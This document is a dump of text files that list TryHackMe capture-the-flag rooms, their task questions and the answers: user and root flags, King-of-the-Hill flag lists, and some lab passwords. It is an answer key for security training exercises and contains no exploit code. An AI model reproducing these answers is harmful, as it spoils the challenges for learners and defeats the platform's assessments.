| 7 | Escalate your privileges and acquire root.txt 8 | thm{7265616c6c696665} 9 | -------------------------------------------------------------------------------- /rooms/tomghost.txt: -------------------------------------------------------------------------------- 1 | tomghost 2 | https://tryhackme.com/room/tomghost 3 | 4 | Compromise this machine and obtain user.txt 5 | THM{GhostCat_1s_so_cr4sy} 6 | 7 | Escalate privileges and obtain root.txt 8 | THM{Z1P_1S_FAKE} 9 | -------------------------------------------------------------------------------- /rooms/tryhack3m burg3r bytes.txt: -------------------------------------------------------------------------------- 1 | TryHack3M: Burg3r Bytes 2 | https://tryhackme.com/room/burg3rbytes 3 | 4 | What is the web app flag? 5 | THM{TryH4ck3M-APP-H4CK} 6 | 7 | What is the host flag? 8 | THM{Try4ck3M-TFTP-FUN} 9 | -------------------------------------------------------------------------------- /rooms/tutorial.txt: -------------------------------------------------------------------------------- 1 | Tutorial 2 | https://tryhackme.com/room/tutorial 3 | 4 | Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 5 | flag{connection_verified} 6 | -------------------------------------------------------------------------------- /koth/fortune.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | thm{9ca1408b352ad45b258afd8d3797f85f} 3 | thm{06834aac0714586f2b2f925cf49bcd31} 4 | thm{43f20e3ed108dda8c2383e5fa0286854} 5 | thm{5e7ea083245c2971820ee4d00ed74e29} 6 | thm{7dcad4ed4067a5a0d58e92fd022e35f4} -------------------------------------------------------------------------------- /koth/h1-medium.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | THM{a95c530a7af5f492a74499e70578d150} 3 | THM{78ab0f3ab9decf59899148c6ba7e07dc} 4 | THM{a3256be7dfd50977a4aae6583babb884} 5 | THM{fe71b156334f5ec0fbd6e9c3cee516ac} 6 | THM{ee4a601a75bc632e2c8cd2a32946c873} -------------------------------------------------------------------------------- /rooms/attacking ics plant #2.txt: -------------------------------------------------------------------------------- 1 | Attacking ICS Plant #2 2 | https://tryhackme.com/room/attackingics2 3 | 4 | Read flag1.txt 5 | 0df2936b4cfbd5ce3ae91ef7021d925a 6 | 7 | Read flag2.txt 8 | fdee450ac6627276d115dd905a256d49 9 | -------------------------------------------------------------------------------- /rooms/dodge.txt: -------------------------------------------------------------------------------- 1 | Dodge 2 | https://tryhackme.com/room/dodge 3 | 4 | What is the content of user.txt? 5 | THM{0649b2285e507b38b10620e57f9c8610} 6 | 7 | What is the content of root.txt? 8 | THM{7b88ac4f52cd8723a8d0c632c2d930ba} 9 | -------------------------------------------------------------------------------- /rooms/exfilibur.txt: -------------------------------------------------------------------------------- 1 | Exfilibur 2 | https://tryhackme.com/room/exfilibur 3 | 4 | What is the user flag? 5 | THM{HACKERS_EXFILTRATE_DATA_NOT_DRAGONS} 6 | 7 | What is the root flag? 8 | THM{STOP_ABUSING_PRIVILEGES_IN_CAMELOT} 9 | -------------------------------------------------------------------------------- /rooms/flatline.txt: -------------------------------------------------------------------------------- 1 | Flatline 2 | https://tryhackme.com/room/flatline 3 | 4 | What is the user.txt flag? 5 | THM{64bca0843d535fa73eecdc59d27cbe26} 6 | 7 | What is the root.txt flag? 8 | THM{8c8bc5558f0f3f8060d00ca231a9fb5e} 9 | -------------------------------------------------------------------------------- /rooms/looney tunables.txt: -------------------------------------------------------------------------------- 1 | Looney Tunables 2 | https://tryhackme.com/room/looneytunes 3 | 4 | Whats the flag? 5 | THM{D0C_Ph1sh3r} 6 | 7 | What's the value of the flag in /root/root.txt? 8 | THM{TH-TH-THATS-SECURE-FOLKS!} 9 | -------------------------------------------------------------------------------- /rooms/u.a. high school.txt: -------------------------------------------------------------------------------- 1 | U.A. High School 2 | https://tryhackme.com/room/yueiua 3 | 4 | What is the user.txt flag? 5 | THM{W3lC0m3_D3kU_1A_0n3f0rAll??} 6 | 7 | What is the root.txt flag? 8 | THM{Y0U_4r3_7h3_NUm83r_1_H3r0} 9 | -------------------------------------------------------------------------------- /rooms/wwbuddy.txt: -------------------------------------------------------------------------------- 1 | WWBuddy 2 | https://tryhackme.com/room/wwbuddy 3 | 4 | Website flag 5 | THM{d0nt_try_4nyth1ng_funny} 6 | 7 | User flag 8 | THM{g4d0_d+_kkkk} 9 | 10 | Root flag 11 | THM{ch4ng3_th3_3nv1r0nm3nt} 12 | -------------------------------------------------------------------------------- /rooms/year of the jellyfish.txt: -------------------------------------------------------------------------------- 1 | Year of the Jellyfish 2 | https://tryhackme.com/room/yearofthejellyfish 3 | 4 | Flag 1 5 | THM{MjBkOTMyZDgzNGZmOGI0Y2I5NTljNGNl} 6 | 7 | Root Flag 8 | THM{YjMyZTkwYzZhM2U5MGEzZDU2MDc1NTMx} 9 | -------------------------------------------------------------------------------- /rooms/colddbox easy.txt: -------------------------------------------------------------------------------- 1 | ColddBox: Easy 2 | https://tryhackme.com/room/colddboxeasy 3 | 4 | user.txt 5 | RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ== 6 | 7 | root.txt 8 | wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE= 9 | -------------------------------------------------------------------------------- /rooms/frank and herby try again......txt: -------------------------------------------------------------------------------- 1 | Frank and Herby try again..... 2 | https://tryhackme.com/room/frankandherbytryagain 3 | 4 | User flag? 5 | THM{I-2h0uld-f1r3-fr4nK} 6 | 7 | Root Flag? 8 | THM{frank-and-herby-still-suck} 9 | -------------------------------------------------------------------------------- /rooms/moebius.txt: -------------------------------------------------------------------------------- 1 | Moebius 2 | https://tryhackme.com/room/moebius 3 | 4 | What is the value of the user flag? 5 | THM{ddb3254b89803ca177d7d11024e7935a} 6 | 7 | What is the value of the root flag? 8 | THM{2ba37995df993f1294e7c155ce7ef929} 9 | -------------------------------------------------------------------------------- /rooms/mountaineer.txt: -------------------------------------------------------------------------------- 1 | Mountaineer 2 | https://tryhackme.com/room/mountaineerlinux 3 | 4 | What is the local.txt flag? 5 | 97a805eb710deb97342a48092876df22 6 | 7 | What is the root.txt flag? 8 | a41824310a621855d9ed507f29eed757 9 | -------------------------------------------------------------------------------- /rooms/oh my webserver.txt: -------------------------------------------------------------------------------- 1 | Oh My WebServer 2 | https://tryhackme.com/room/ohmyweb 3 | 4 | What is the user flag? 5 | THM{eacffefe1d2aafcc15e70dc2f07f7ac1} 6 | 7 | What is the root flag? 8 | THM{7f147ef1f36da9ae29529890a1b6011f} 9 | -------------------------------------------------------------------------------- /rooms/w1seguy.txt: -------------------------------------------------------------------------------- 1 | W1seGuy 2 | https://tryhackme.com/room/w1seguy 3 | 4 | What is the first flag? 5 | THM{p1alntExtAtt4ckcAnr3alLyhUrty0urxOr} 6 | 7 | What is the second and final flag? 8 | THM{BrUt3_ForC1nG_XOR_cAn_B3_FuN_nO?} 9 | -------------------------------------------------------------------------------- /rooms/el bandito.txt: -------------------------------------------------------------------------------- 1 | El Bandito 2 | https://tryhackme.com/room/elbandito 3 | 4 | Whats the first web flag? 5 | THM{:::MY_DECLINATION:+62°_14'_31.4'':::} 6 | 7 | Whats the second web flag? 8 | THM{¡!¡RIGHT_ASCENSION_12h_36m_25.46s!¡!} 9 | -------------------------------------------------------------------------------- /rooms/ldap injection.txt: -------------------------------------------------------------------------------- 1 | LDAP Injection 2 | https://tryhackme.com/room/ldapinjection 3 | 4 | What is the flag? 5 | THM{!b451c_ld4p_inj3ct1ON!} 6 | 7 | What is the flag in the dashboard? 8 | THM{!!bl1nDLd4P1nj3ct10n!!} 9 | 10 | -------------------------------------------------------------------------------- /rooms/silver platter.txt: -------------------------------------------------------------------------------- 1 | Silver Platter 2 | https://tryhackme.com/room/silverplatter 3 | 4 | What is the user flag? 5 | THM{c4ca4238a0b923820dcc509a6f75849b} 6 | 7 | What is the root flag? 8 | THM{098f6bcd4621d373cade4e832627b4f6} 9 | -------------------------------------------------------------------------------- /rooms/stealth.txt: -------------------------------------------------------------------------------- 1 | Stealth 2 | https://tryhackme.com/room/stealth 3 | 4 | What is the content of the user level flag? 5 | THM{1010_EVASION_LOCAL_USER} 6 | 7 | What is the content of the root level flag? 8 | THM{101011_ADMIN_ACCESS} 9 | -------------------------------------------------------------------------------- /rooms/tempus fugit durius.txt: -------------------------------------------------------------------------------- 1 | Tempus Fugit Durius 2 | https://tryhackme.com/room/tempusfugitdurius 3 | 4 | What is flag 1? 5 | THM{Nice_Work_Got_Ben_Clower} 6 | 7 | What is flag 2? 8 | THM{Great_work!_You_Rooted_TempusFugitDurius!} 9 | -------------------------------------------------------------------------------- /rooms/vulnnet.txt: -------------------------------------------------------------------------------- 1 | VulnNet 2 | https://tryhackme.com/room/vulnnet1 3 | 4 | What is the user flag? (user.txt) 5 | THM{907e420d979d8e2992f3d7e16bee1e8b} 6 | 7 | What is the root flag? (root.txt) 8 | THM{220b671dd8adc301b34c2738ee8295ba} 9 | -------------------------------------------------------------------------------- /rooms/enterprise.txt: -------------------------------------------------------------------------------- 1 | Enterprise 2 | https://tryhackme.com/room/enterprise 3 | 4 | What is the contents of User.txt 5 | THM{ed882d02b34246536ef7da79062bef36} 6 | 7 | What is the contents of Root.txt 8 | THM{1a1fa94875421296331f145971ca4881} 9 | -------------------------------------------------------------------------------- /rooms/forgotten implant.txt: -------------------------------------------------------------------------------- 1 | Forgotten Implant 2 | https://tryhackme.com/room/forgottenimplant 3 | 4 | What is the user flag? 5 | THM{902e8e8b1f49dfeb678e419935be23ef} 6 | 7 | What is the root flag? 8 | THM{7762118e4a93b277cb2fb221745d2cf1} 9 | -------------------------------------------------------------------------------- /rooms/hammer.txt: -------------------------------------------------------------------------------- 1 | Hammer 2 | https://tryhackme.com/room/hammer 3 | 4 | What is the flag value after logging in to the dashboard? 5 | THM{AuthBypass3D} 6 | 7 | What is the content of the file /home/ubuntu/flag.txt? 8 | THM{RUNANYCOMMAND1337} 9 | -------------------------------------------------------------------------------- /rooms/jack-of-all-trades.txt: -------------------------------------------------------------------------------- 1 | Jack-of-All-Trades 2 | https://tryhackme.com/room/jackofalltrades 3 | 4 | User Flag 5 | securi-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3} 6 | 7 | Root Flag 8 | securi-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a} 9 | -------------------------------------------------------------------------------- /rooms/fortress.txt: -------------------------------------------------------------------------------- 1 | Fortress 2 | https://tryhackme.com/room/fortress 3 | 4 | What is the flag in user.txt? 5 | 84589a1bb8a932e46643b242a55489c0 6 | 7 | Escalate your privileges, what is the flag in root.txt? 8 | 3a17cfcca1aabc245a2d5779615643ae 9 | -------------------------------------------------------------------------------- /rooms/napping.txt: -------------------------------------------------------------------------------- 1 | Napping 2 | https://tryhackme.com/room/nappingis1337 3 | 4 | What is the user flag? 5 | THM{Wh@T_1S_Tab_NAbbiN6_&_PrinCIPl3_of_L3A$t_PriViL36E} 6 | 7 | What is the root flag? 8 | THM{Adm1n$_jU$t_c@n'T_stAy_Aw@k3_T$k_tsk_tSK} 9 | -------------------------------------------------------------------------------- /rooms/sudo security bypass.txt: -------------------------------------------------------------------------------- 1 | Sudo Security Bypass 2 | https://tryhackme.com/room/sudovulnsbypass 3 | 4 | What command are you allowed to run with sudo? 5 | /bin/bash 6 | 7 | What is the flag in /root/root.txt? 8 | THM{l33t_s3cur1ty_bypass} 9 | -------------------------------------------------------------------------------- /rooms/cheese ctf.txt: -------------------------------------------------------------------------------- 1 | Cheese CTF 2 | https://tryhackme.com/room/cheesectfv10 3 | 4 | What is the user.txt flag? 5 | THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a} 6 | 7 | What is the root.txt flag? 8 | THM{dca75486094810807faf4b7b0a929b11e5e0167c} 9 | -------------------------------------------------------------------------------- /rooms/devie.txt: -------------------------------------------------------------------------------- 1 | Devie 2 | https://tryhackme.com/room/devie 3 | 4 | What is the first flag? 5 | THM{Car3ful_witH_3v@l} 6 | 7 | What is the second flag? 8 | THM{X0R_XoR_XOr_xOr} 9 | 10 | What is the root flag? 11 | THM{J0k3r$_Ar3_W1ld} 12 | -------------------------------------------------------------------------------- /rooms/dx1 liberty island.txt: -------------------------------------------------------------------------------- 1 | DX1: Liberty Island 2 | https://tryhackme.com/room/dx1libertyislandplde 3 | 4 | What is the User flag? 5 | thm{6ae787a98fff512ae33335e1264f0dd3} 6 | 7 | What is the Root flag? 8 | thm{985bb3c88bfe66f9b465b00198692866} 9 | -------------------------------------------------------------------------------- /rooms/fowsniff ctf.txt: -------------------------------------------------------------------------------- 1 | Fowsniff CTF 2 | https://tryhackme.com/room/ctf 3 | 4 | What was seina's password to the email service? 5 | scoobydoo2 6 | 7 | Looking through her emails, what was a temporary password set for her? 8 | S1ck3nBluff+secureshell 9 | -------------------------------------------------------------------------------- /rooms/hacker vs. hacker.txt: -------------------------------------------------------------------------------- 1 | Hacker vs. Hacker 2 | https://tryhackme.com/room/hackervshacker 3 | 4 | What is the user.txt flag? 5 | thm{af7e46b68081d4025c5ce10851430617} 6 | 7 | What is the proof.txt flag? 8 | thm{7b708e5224f666d3562647816ee2a1d4} 9 | -------------------------------------------------------------------------------- /rooms/jack.txt: -------------------------------------------------------------------------------- 1 | Jack 2 | https://tryhackme.com/room/jack 3 | 4 | Gain initial access and obtain the user flag. 5 | 0052f7829e48752f2e7bf50f1231548a 6 | 7 | Escalate your privileges to root. Whats the root flag? 8 | b8b63a861cc09e853f29d8055d64bffb 9 | -------------------------------------------------------------------------------- /rooms/nonamectf.txt: -------------------------------------------------------------------------------- 1 | NoNameCTF 2 | https://tryhackme.com/room/nonamectf 3 | 4 | Compromise this machine and obtain user.txt 5 | THM{SSTI_AND_BUFFER_OVERFLOW_W4S_HERE} 6 | 7 | Escalate privileges and obtain root.txt 8 | THN{F4KE_PIP_PACKAGE_INSTALL} 9 | -------------------------------------------------------------------------------- /rooms/rocket.txt: -------------------------------------------------------------------------------- 1 | Rocket 2 | https://tryhackme.com/room/rocket 3 | 4 | What is contained within the user.txt file? 5 | THM{9f87696626a585380d3c1697087e5b5b} 6 | 7 | What is contained within the root.txt file? 8 | THM{6613b7f76a88b32230eac584b0e18cfd} 9 | -------------------------------------------------------------------------------- /rooms/vulnnet node.txt: -------------------------------------------------------------------------------- 1 | VulnNet: Node 2 | https://tryhackme.com/room/vulnnetnode 3 | 4 | What is the user flag? (user.txt) 5 | THM{064640a2f880ce9ed7a54886f1bde821} 6 | 7 | What is the root flag? (root.txt) 8 | THM{abea728f211b105a608a720a37adabf9} 9 | -------------------------------------------------------------------------------- /rooms/cmess.txt: -------------------------------------------------------------------------------- 1 | CMesS 2 | https://tryhackme.com/room/cmess 3 | 4 | Compromise this machine and obtain user.txt 5 | thm{c529b5d5d6ab6b430b7eb1903b2b5e1b} 6 | 7 | Escalate your privileges and obtain root.txt 8 | thm{9f85b7fdeb2cf96985bf5761a93546a2} 9 | -------------------------------------------------------------------------------- /rooms/jpgchat.txt: -------------------------------------------------------------------------------- 1 | JPGChat 2 | https://tryhackme.com/room/jpgchat 3 | 4 | Establish a foothold and get user.txt 5 | JPC{487030410a543503cbb59ece16178318} 6 | 7 | Escalate your privileges to root and read root.txt 8 | JPC{665b7f2e59cf44763e5a7f070b081b0a} 9 | -------------------------------------------------------------------------------- /rooms/vulnnet dotjar.txt: -------------------------------------------------------------------------------- 1 | VulnNet: dotjar 2 | https://tryhackme.com/room/vulnnetdotjar 3 | 4 | What is the user flag? (user.txt) 5 | THM{1ae87fa6ec2cd9f840c68cbad78e9351} 6 | 7 | What is the root flag? (root.txt) 8 | THM{464c29e3ffae05c2e67e6f0c5064759c} 9 | -------------------------------------------------------------------------------- /rooms/vulnnet dotpy.txt: -------------------------------------------------------------------------------- 1 | VulnNet: dotpy 2 | https://tryhackme.com/room/vulnnetdotpy 3 | 4 | What is the user flag? (user.txt) 5 | THM{91c7547864fa1314a306f82a14cd7fb4} 6 | 7 | What is the root flag? (root.txt) 8 | THM{734c7c2f0a23a4f590aa8600676021fb} 9 | -------------------------------------------------------------------------------- /rooms/whats your name.txt: -------------------------------------------------------------------------------- 1 | Whats Your Name? 2 | https://tryhackme.com/room/whatsyourname 3 | 4 | What is the flag value after accessing the moderator account? 5 | ModP@wnEd 6 | 7 | What is the flag value after accessing the admin panel? 8 | AdM!nP@wnEd 9 | -------------------------------------------------------------------------------- /rooms/decryptify.txt: -------------------------------------------------------------------------------- 1 | Decryptify 2 | https://tryhackme.com/room/decryptify 3 | 4 | What is the flag value after logging into the panel? 5 | THM{CryptographyPwn007} 6 | 7 | What is the content of the /home/ubuntu/flag.txt file? 8 | THM{GOT_COMMAND_EXECUTION001} 9 | -------------------------------------------------------------------------------- /rooms/for business reasons.txt: -------------------------------------------------------------------------------- 1 | For Business Reasons 2 | https://tryhackme.com/room/forbusinessreasons 3 | 4 | What is flag 0? 5 | ya7ooShiivagaipi 6 | 7 | What is the user flag? 8 | osh4loNi 9 | 10 | What is the root flag? 11 | Kainiy1Onoonoh3j 12 | -------------------------------------------------------------------------------- /rooms/year of the rabbit.txt: -------------------------------------------------------------------------------- 1 | Year of the Rabbit 2 | https://tryhackme.com/room/yearoftherabbit 3 | 4 | What is the user flag? 5 | THM{1107174691af9ff3681d2b5bdb5740b1589bae53} 6 | 7 | What is the root flag? 8 | THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} 9 | -------------------------------------------------------------------------------- /rooms/dreaming.txt: -------------------------------------------------------------------------------- 1 | Dreaming 2 | https://tryhackme.com/room/dreaming 3 | 4 | What is the Lucien Flag? 5 | THM{TH3_L1BR4R14N} 6 | 7 | What is the Death Flag? 8 | THM{1M_TH3R3_4_TH3M} 9 | 10 | What is the Morpheus Flag? 11 | THM{DR34MS_5H4P3_TH3_W0RLD} 12 | -------------------------------------------------------------------------------- /rooms/dx2 hells kitchen.txt: -------------------------------------------------------------------------------- 1 | DX2: Hell's Kitchen 2 | https://tryhackme.com/room/dx2hellskitchen 3 | 4 | What is the Web Flag? 5 | thm{adb5b797ee0d01a8c052dbee46fbc065e8c52afd} 6 | 7 | What is the User Flag? 8 | 9 | 10 | What is the Root Flag? 11 | 12 | -------------------------------------------------------------------------------- /rooms/fusion corp.txt: -------------------------------------------------------------------------------- 1 | Fusion Corp 2 | https://tryhackme.com/room/fusioncorp 3 | 4 | User 1 5 | THM{c105b6fb249741b89432fada8218f4ef} 6 | 7 | User 2 8 | THM{b4aee2db2901514e28db4242e047612e} 9 | 10 | User 3 11 | THM{f72988e57bfc1deeebf2115e10464d15} 12 | -------------------------------------------------------------------------------- /rooms/harder.txt: -------------------------------------------------------------------------------- 1 | harder 2 | https://tryhackme.com/room/harder 3 | 4 | Hack the machine and obtain the user Flag (user.txt) 5 | 7e88bf11a579dc5ed66cc798cbe49f76 6 | 7 | Escalate your privileges and get the root Flag (root.txt) 8 | 3a7bd72672889e0756b09f0566935a6c 9 | -------------------------------------------------------------------------------- /rooms/localpotato.txt: -------------------------------------------------------------------------------- 1 | LocalPotato 2 | https://tryhackme.com/room/localpotato 3 | 4 | Elevate your privileges on the system to get an administrative console. What is the value of the flag in C:\users\administrator\desktop\flag.txt? 5 | THM{local_potatoes_best_potatoes} 6 | -------------------------------------------------------------------------------- /rooms/plotted-emr.txt: -------------------------------------------------------------------------------- 1 | Plotted-EMR 2 | https://tryhackme.com/room/plottedemr 3 | 4 | What is flag 1? 5 | THM{EMR_PWn3d_CV3} 6 | 7 | What is user.txt? 8 | 1aea32fbd5b592af1267d65dbcc3e212 9 | 10 | What is root.txt? 11 | 827a0e697e1567f08022ba72106ace99 12 | -------------------------------------------------------------------------------- /rooms/ra.txt: -------------------------------------------------------------------------------- 1 | Ra 2 | https://tryhackme.com/room/ra 3 | 4 | Flag 1 5 | THM{466d52dc75a277d6c3f6c6fcbc716d6b62420f48} 6 | 7 | Flag 2 8 | THM{6f690fc72b9ae8dc25a24a104ed804ad06c7c9b1} 9 | 10 | Flag 3 11 | THM{ba3a2bff2e535b514ad760c283890faae54ac2ef} 12 | -------------------------------------------------------------------------------- /rooms/set.txt: -------------------------------------------------------------------------------- 1 | Set 2 | https://tryhackme.com/room/set 3 | 4 | Flag 1 5 | THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14} 6 | 7 | Flag 2 8 | THM{690798b1780964f5f51cebd854da5a2ea236ebb5} 9 | 10 | Flag 3 11 | THM{934f7faaadab3b040edab8214789114c9d3049dd} 12 | -------------------------------------------------------------------------------- /rooms/battery.txt: -------------------------------------------------------------------------------- 1 | battery 2 | https://tryhackme.com/room/battery 3 | 4 | Base Flag : 5 | THM{6f7e4dd134e19af144c88e4fe46c67ea} 6 | 7 | User Flag : 8 | THM{20c1d18791a246001f5df7867d4e6bf5} 9 | 10 | Root Flag : 11 | THM{db12b4451d5e70e2a177880ecfe3428d} 12 | -------------------------------------------------------------------------------- /rooms/erlang otp ssh cve-2025-32433.txt: -------------------------------------------------------------------------------- 1 | Erlang/OTP SSH: CVE-2025-32433 2 | https://tryhackme.com/room/erlangotpsshcve202532433 3 | 4 | What is the flag hidden in the root directory? 5 | THM{U57U3P5KnR} 6 | 7 | What is the hostname of the system? 8 | c7b79fd068ba 9 | 10 | -------------------------------------------------------------------------------- /rooms/overpass.txt: -------------------------------------------------------------------------------- 1 | Overpass 2 | https://tryhackme.com/room/overpass 3 | 4 | Hack the machine and get the flag in user.txt 5 | thm{65c1aaf000506e56996822c6281e6bf7} 6 | 7 | Escalate your privileges and get the flag in root.txt 8 | thm{7f336f8c359dbac18d54fdd64ea753bb} 9 | -------------------------------------------------------------------------------- /rooms/red stone one carat.txt: -------------------------------------------------------------------------------- 1 | Red Stone One Carat 2 | https://tryhackme.com/room/redstoneonecarat 3 | 4 | SSH password 5 | cheeseburger 6 | 7 | user.txt 8 | THM{3a106092635945849a0fbf7bac92409d} 9 | 10 | root.txt 11 | THM{58e53d1324eef6265fdb97b08ed9aadf} 12 | -------------------------------------------------------------------------------- /rooms/the server from hell.txt: -------------------------------------------------------------------------------- 1 | The Server From Hell 2 | https://tryhackme.com/room/theserverfromhell 3 | 4 | flag.txt 5 | thm{h0p3_y0u_l1k3d_th3_f1r3w4ll} 6 | 7 | user.txt 8 | thm{sh3ll_3c4p3_15_v3ry_1337} 9 | 10 | root.txt 11 | thm{w0w_n1c3_3sc4l4t10n} 12 | -------------------------------------------------------------------------------- /koth/shrek.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | 0069ba233da89efe6f48e7d214034130 3 | 8cc6ece048e6c42251c411814ff5a22d 4 | 974acecd51cc45c843062fdac6235e97 5 | 6f960e8f2ea8e3de92f192fae492ec59 6 | af847d9403e2106a3cb2fd69f33b2d5e 7 | 456ca96a9ba8a9f527089ddde0efc92d 8 | 877fe779d235694836c7f5478363974f -------------------------------------------------------------------------------- /rooms/hack smarter security.txt: -------------------------------------------------------------------------------- 1 | Hack Smarter Security 2 | https://tryhackme.com/room/hacksmartersecurity 3 | 4 | What is user.txt? 5 | THM{4ll15n0tw3llw1thd3ll} 6 | 7 | Which organizations is the Hack Smarter group targeting next? 8 | CyberLens, WorkSmarter, SteelMountain 9 | -------------------------------------------------------------------------------- /rooms/include.txt: -------------------------------------------------------------------------------- 1 | Include 2 | https://tryhackme.com/room/include 3 | 4 | What is the flag value after logging in to the SysMon app? 5 | THM{!50_55Rf_1S_d_k3Y??!} 6 | 7 | What is the content of the hidden text file in /var/www/html? 8 | THM{505eb0fb8a9f32853b4d955e1f9123ea} 9 | -------------------------------------------------------------------------------- /rooms/mr robot ctf.txt: -------------------------------------------------------------------------------- 1 | Mr Robot CTF 2 | https://tryhackme.com/room/mrrobot 3 | 4 | What is key 1? 5 | 073403c8a58a1f80d943455fb30724b9 6 | 7 | What is key 2? 8 | 822c73956184f694993bede3eb39f959 9 | 10 | What is key 3? 11 | 04787ddef27c3dee1ee161b21670b4e4 12 | -------------------------------------------------------------------------------- /rooms/vulnnet active.txt: -------------------------------------------------------------------------------- 1 | VulnNet: Active 2 | https://tryhackme.com/room/vulnnetactive 3 | 4 | What is the user flag? (Desktop\user.txt) 5 | THM{3eb176aee96432d5b100bc93580b291e} 6 | 7 | What is the system flag? (Desktop\system.txt) 8 | THM{d540c0645975900e5bb9167aa431fc9b} 9 | -------------------------------------------------------------------------------- /rooms/palsforlife.txt: -------------------------------------------------------------------------------- 1 | PalsForLife 2 | https://tryhackme.com/room/palsforlife 3 | 4 | Flag 1 5 | flag{Stick_to_the_plan!} 6 | 7 | Flag 2 8 | flag{_G0ddamit_Leeroy_} 9 | 10 | Flag 3 11 | flag{Its_n0t_my_fault!} 12 | 13 | Flag 4 14 | flag{At_least_I_have_chicKen} 15 | -------------------------------------------------------------------------------- /rooms/snowy armageddon.txt: -------------------------------------------------------------------------------- 1 | Snowy ARMageddon 2 | https://tryhackme.com/room/armageddon2r 3 | 4 | What is the content of the first flag? 5 | THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR} 6 | 7 | What is the content of the yetikey2.txt file? 8 | 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK 9 | -------------------------------------------------------------------------------- /rooms/vulnnet roasted.txt: -------------------------------------------------------------------------------- 1 | VulnNet: Roasted 2 | https://tryhackme.com/room/vulnnetroasted 3 | 4 | What is the user flag? (Desktop\user.txt) 5 | THM{726b7c0baaac1455d05c827b5561f4ed} 6 | 7 | What is the system flag? (Desktop\system.txt) 8 | THM{16f45e3934293a57645f8d7bf71d8d4c} 9 | -------------------------------------------------------------------------------- /rooms/wonderland.txt: -------------------------------------------------------------------------------- 1 | Wonderland 2 | https://tryhackme.com/room/wonderland 3 | 4 | Obtain the flag in user.txt 5 | thm{"Curiouser and curiouser!"} 6 | 7 | Escalate your privileges, what is the flag in root.txt? 8 | thm{Twinkle, twinkle, little bat! How I wonder what you’re at!} 9 | -------------------------------------------------------------------------------- /rooms/year of the pig.txt: -------------------------------------------------------------------------------- 1 | Year of the Pig 2 | https://tryhackme.com/room/yearofthepig 3 | 4 | Flag 1 5 | THM{MDg0MGVjYzFjY2ZkZGMzMWY1NGZiNjhl} 6 | 7 | Flag 2 8 | THM{Y2Q2N2M1NzNmYTQzYTI4ODliYzkzMmZh} 9 | 10 | Root Flag 11 | THM{MjcxNmVmYjNhYzdkZDc0M2RkNTZhNDA0} 12 | -------------------------------------------------------------------------------- /rooms/cat pictures 2.txt: -------------------------------------------------------------------------------- 1 | Cat Pictures 2 2 | https://tryhackme.com/room/catpictures2 3 | 4 | What is Flag 1? 5 | 10d916eaea54bb5ebe36b59538146bb5 6 | 7 | What is Flag 2? 8 | 5e2cafbbf180351702651c09cd797920 9 | 10 | What is Flag 3? 11 | 6d2a9f8f8174e86e27d565087a28a971 12 | -------------------------------------------------------------------------------- /rooms/cherryblossom.txt: -------------------------------------------------------------------------------- 1 | CherryBlossom 2 | https://tryhackme.com/room/cherryblossom 3 | 4 | Journal Flag 5 | THM{054a8f1db7618f8f6a41a0b3349baa11} 6 | 7 | User Flag 8 | THM{cb064113d54e24dc84f26b1f63bf3098} 9 | 10 | Root Flag 11 | THM{d4b5e228a567288d12e301f2f0bf5be0} 12 | -------------------------------------------------------------------------------- /rooms/en-pass.txt: -------------------------------------------------------------------------------- 1 | En-pass 2 | https://tryhackme.com/room/enpass 3 | 4 | Name The Path. 5 | /web/resources/infoseek/configure/key 6 | 7 | What is the user flag? 8 | 1c5ccb6ce6f3561e302e0e516c633da9 9 | 10 | What is the root flag? 11 | 5d45f08ee939521d59247233d3f8fafd 12 | -------------------------------------------------------------------------------- /rooms/glitch.txt: -------------------------------------------------------------------------------- 1 | GLITCH 2 | https://tryhackme.com/room/glitch 3 | 4 | What is your access token? 5 | this_is_not_real 6 | 7 | What is the content of user.txt? 8 | THM{i_don't_know_why} 9 | 10 | What is the content of root.txt? 11 | THM{diamonds_break_our_aching_minds} 12 | -------------------------------------------------------------------------------- /rooms/hydra.txt: -------------------------------------------------------------------------------- 1 | Hydra 2 | https://tryhackme.com/room/hydra 3 | 4 | Use Hydra to bruteforce molly's web password. What is flag 1? 5 | THM{2673a7dd116de68e85c48ec0b1f2612e} 6 | 7 | Use Hydra to bruteforce molly's SSH password. What is flag 2? 8 | THM{c8eeb0468febbadea859baeb33b2541b} 9 | -------------------------------------------------------------------------------- /rooms/red.txt: -------------------------------------------------------------------------------- 1 | Red 2 | https://tryhackme.com/room/redisl33t 3 | 4 | What is the first flag? 5 | THM{Is_thAt_all_y0u_can_d0_blU3?} 6 | 7 | What is the second flag? 8 | THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S} 9 | 10 | What is the third flag? 11 | THM{Go0d_Gam3_Blu3_GG} 12 | -------------------------------------------------------------------------------- /rooms/whiterose.txt: -------------------------------------------------------------------------------- 1 | Whiterose 2 | https://tryhackme.com/room/whiterose 3 | 4 | What's Tyrell Wellick's phone number? 5 | 842-029-5701 6 | 7 | What is the user.txt flag? 8 | THM{4lways_upd4te_uR_d3p3nd3nc!3s} 9 | 10 | What is the root.txt flag? 11 | THM{4nd_uR_p4ck4g3s} 12 | -------------------------------------------------------------------------------- /rooms/anonymous playground.txt: -------------------------------------------------------------------------------- 1 | Anonymous Playground 2 | https://tryhackme.com/room/anonymousplayground 3 | 4 | User 1 Flag 5 | 9184177ecaa83073cbbf36f1414cc029 6 | 7 | User 2 Flag 8 | 69ee352fb139c9d0699f6f399b63d9d7 9 | 10 | Root Flag 11 | bc55a426e98deb673beabda50f24ce66 12 | -------------------------------------------------------------------------------- /rooms/breakme.txt: -------------------------------------------------------------------------------- 1 | Breakme 2 | https://tryhackme.com/room/breakmenu 3 | 4 | What is the first flag? 5 | 5c3ea0d312568c7ac68d213785b26677 6 | 7 | What is the second flag? 8 | df5b1b7f4f74a416ae27673b22633c1b 9 | 10 | What is the root flag? 11 | 